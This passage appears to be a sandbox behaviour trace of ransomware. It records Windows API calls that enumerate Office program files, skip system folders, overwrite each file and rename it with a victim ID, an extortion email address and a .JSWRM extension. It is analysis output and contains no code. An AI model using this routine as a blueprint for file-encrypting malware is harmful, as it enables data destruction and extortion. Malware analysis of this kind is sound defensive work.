lpOverlapped=0x0) returned 1 [0141.215] CloseHandle (hObject=0x238) returned 1 [0141.215] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBBTN.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebbtn.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBBTN.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebbtn.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.216] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x110e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGWEBBTN.XML", cAlternateFileName="")) returned 1 [0141.216] lstrcmpiW (lpString1="DGWEBBTN.XML", lpString2=".") returned 1 [0141.216] lstrcmpiW (lpString1="DGWEBBTN.XML", lpString2="..") returned 1 [0141.216] lstrcmpiW (lpString1="DGWEBBTN.XML", lpString2="...") returned 1 [0141.216] lstrcmpiW (lpString1="DGWEBBTN.XML", lpString2="windows") returned -1 [0141.216] lstrcmpiW (lpString1="DGWEBBTN.XML", lpString2="recovery") returned -1 [0141.216] lstrcmpiW (lpString1="DGWEBBTN.XML", lpString2="perflogs") returned -1 [0141.216] lstrcmpiW (lpString1="DGWEBBTN.XML", lpString2="documents and settings") returned -1 [0141.216] lstrcmpiW (lpString1="DGWEBBTN.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.216] lstrcmpiW (lpString1="DGWEBBTN.XML", lpString2="system volume information") returned -1 [0141.216] lstrcmpiW (lpString1="DGWEBBTN.XML", lpString2="msocache") returned -1 [0141.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBBTN.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBBTN.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBBTN.XML", lpUsedDefaultChar=0x0) returned 12 [0141.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBBTN.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBBTN.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBBTN.XML", lpUsedDefaultChar=0x0) returned 12 [0141.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBBTN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebbtn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.218] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4366) returned 1 [0141.218] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.218] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1100, lpOverlapped=0x0) returned 1 [0141.220] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.220] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1100, lpOverlapped=0x0) returned 1 [0141.220] CloseHandle (hObject=0x238) returned 1 [0141.220] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBBTN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebbtn.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBBTN.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebbtn.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.221] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a2da43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a2da43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a53b55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x301be, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGWEBCAL.DPV", cAlternateFileName="")) returned 1 [0141.222] lstrcmpiW (lpString1="DGWEBCAL.DPV", lpString2=".") returned 1 [0141.222] lstrcmpiW (lpString1="DGWEBCAL.DPV", lpString2="..") returned 1 [0141.222] lstrcmpiW (lpString1="DGWEBCAL.DPV", lpString2="...") returned 1 [0141.222] lstrcmpiW (lpString1="DGWEBCAL.DPV", lpString2="windows") returned -1 [0141.222] lstrcmpiW (lpString1="DGWEBCAL.DPV", lpString2="recovery") returned -1 [0141.222] lstrcmpiW (lpString1="DGWEBCAL.DPV", lpString2="perflogs") returned -1 [0141.222] lstrcmpiW (lpString1="DGWEBCAL.DPV", lpString2="documents and settings") returned -1 [0141.222] lstrcmpiW (lpString1="DGWEBCAL.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.222] lstrcmpiW (lpString1="DGWEBCAL.DPV", lpString2="system volume information") returned -1 [0141.222] lstrcmpiW (lpString1="DGWEBCAL.DPV", lpString2="msocache") returned -1 [0141.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBCAL.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBCAL.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBCAL.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBCAL.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBCAL.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBCAL.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBCAL.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebcal.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.223] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=197054) returned 1 [0141.223] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.223] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0141.235] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.235] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.236] CloseHandle (hObject=0x238) returned 1 [0141.236] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBCAL.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebcal.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBCAL.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebcal.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.237] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc74eab3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1cb0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGWEBCAL.XML", cAlternateFileName="")) returned 1 [0141.237] lstrcmpiW (lpString1="DGWEBCAL.XML", lpString2=".") returned 1 [0141.237] lstrcmpiW (lpString1="DGWEBCAL.XML", lpString2="..") returned 1 [0141.237] lstrcmpiW (lpString1="DGWEBCAL.XML", lpString2="...") returned 1 [0141.237] lstrcmpiW (lpString1="DGWEBCAL.XML", lpString2="windows") returned -1 [0141.237] lstrcmpiW (lpString1="DGWEBCAL.XML", lpString2="recovery") returned -1 [0141.237] lstrcmpiW (lpString1="DGWEBCAL.XML", lpString2="perflogs") returned -1 [0141.237] lstrcmpiW (lpString1="DGWEBCAL.XML", lpString2="documents and settings") returned -1 [0141.237] lstrcmpiW (lpString1="DGWEBCAL.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.237] lstrcmpiW (lpString1="DGWEBCAL.XML", lpString2="system volume information") returned -1 [0141.237] lstrcmpiW (lpString1="DGWEBCAL.XML", lpString2="msocache") returned -1 [0141.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBCAL.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBCAL.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBCAL.XML", lpUsedDefaultChar=0x0) returned 12 [0141.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBCAL.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBCAL.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBCAL.XML", lpUsedDefaultChar=0x0) returned 12 [0141.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBCAL.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebcal.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.238] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7344) returned 1 [0141.238] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.238] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1cb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1cb0, lpOverlapped=0x0) returned 1 [0141.240] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.240] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1cb0, lpOverlapped=0x0) returned 1 [0141.240] CloseHandle (hObject=0x238) returned 1 [0141.240] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBCAL.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebcal.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBCAL.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebcal.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.241] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a2da43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a2da43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21bab08a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f814, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGWEBHD.DPV", cAlternateFileName="")) returned 1 [0141.241] lstrcmpiW (lpString1="DGWEBHD.DPV", lpString2=".") returned 1 [0141.241] lstrcmpiW (lpString1="DGWEBHD.DPV", lpString2="..") returned 1 [0141.241] lstrcmpiW (lpString1="DGWEBHD.DPV", lpString2="...") returned 1 [0141.241] lstrcmpiW (lpString1="DGWEBHD.DPV", lpString2="windows") returned -1 [0141.241] lstrcmpiW (lpString1="DGWEBHD.DPV", lpString2="recovery") returned -1 [0141.241] lstrcmpiW (lpString1="DGWEBHD.DPV", lpString2="perflogs") returned -1 [0141.242] lstrcmpiW (lpString1="DGWEBHD.DPV", lpString2="documents and settings") returned -1 [0141.242] lstrcmpiW (lpString1="DGWEBHD.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.242] lstrcmpiW (lpString1="DGWEBHD.DPV", lpString2="system volume information") returned -1 [0141.242] lstrcmpiW (lpString1="DGWEBHD.DPV", lpString2="msocache") returned -1 [0141.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBHD.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBHD.DPV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBHD.DPV", lpUsedDefaultChar=0x0) returned 11 [0141.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBHD.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBHD.DPV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBHD.DPV", lpUsedDefaultChar=0x0) returned 11 [0141.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBHD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebhd.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.243] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=194580) returned 1 [0141.243] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.243] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0141.256] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.256] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.257] CloseHandle (hObject=0x238) returned 1 [0141.257] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBHD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebhd.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBHD.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebhd.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.258] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc74eab3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1dbc, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGWEBHD.XML", cAlternateFileName="")) returned 1 [0141.258] lstrcmpiW (lpString1="DGWEBHD.XML", lpString2=".") returned 1 [0141.258] lstrcmpiW (lpString1="DGWEBHD.XML", lpString2="..") returned 1 [0141.258] lstrcmpiW (lpString1="DGWEBHD.XML", lpString2="...") returned 1 [0141.258] lstrcmpiW (lpString1="DGWEBHD.XML", lpString2="windows") returned -1 [0141.258] lstrcmpiW (lpString1="DGWEBHD.XML", lpString2="recovery") returned -1 [0141.258] lstrcmpiW (lpString1="DGWEBHD.XML", lpString2="perflogs") returned -1 [0141.258] lstrcmpiW (lpString1="DGWEBHD.XML", lpString2="documents and settings") returned -1 [0141.258] lstrcmpiW (lpString1="DGWEBHD.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.258] lstrcmpiW (lpString1="DGWEBHD.XML", lpString2="system volume information") returned -1 [0141.258] lstrcmpiW (lpString1="DGWEBHD.XML", lpString2="msocache") returned -1 [0141.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBHD.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBHD.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBHD.XML", lpUsedDefaultChar=0x0) returned 11 [0141.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBHD.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBHD.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBHD.XML", lpUsedDefaultChar=0x0) returned 11 [0141.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBHD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebhd.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.259] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7612) returned 1 [0141.259] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.259] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1db0, lpOverlapped=0x0) returned 1 [0141.261] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.261] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1db0, lpOverlapped=0x0) returned 1 [0141.261] CloseHandle (hObject=0x238) returned 1 [0141.261] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBHD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebhd.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBHD.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebhd.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.262] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21bf74fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21bf74fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21bf74fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGWEBPQT.DPV", cAlternateFileName="")) returned 1 [0141.263] lstrcmpiW (lpString1="DGWEBPQT.DPV", lpString2=".") returned 1 [0141.263] lstrcmpiW (lpString1="DGWEBPQT.DPV", lpString2="..") returned 1 [0141.263] lstrcmpiW (lpString1="DGWEBPQT.DPV", lpString2="...") returned 1 [0141.263] lstrcmpiW (lpString1="DGWEBPQT.DPV", lpString2="windows") returned -1 [0141.263] lstrcmpiW 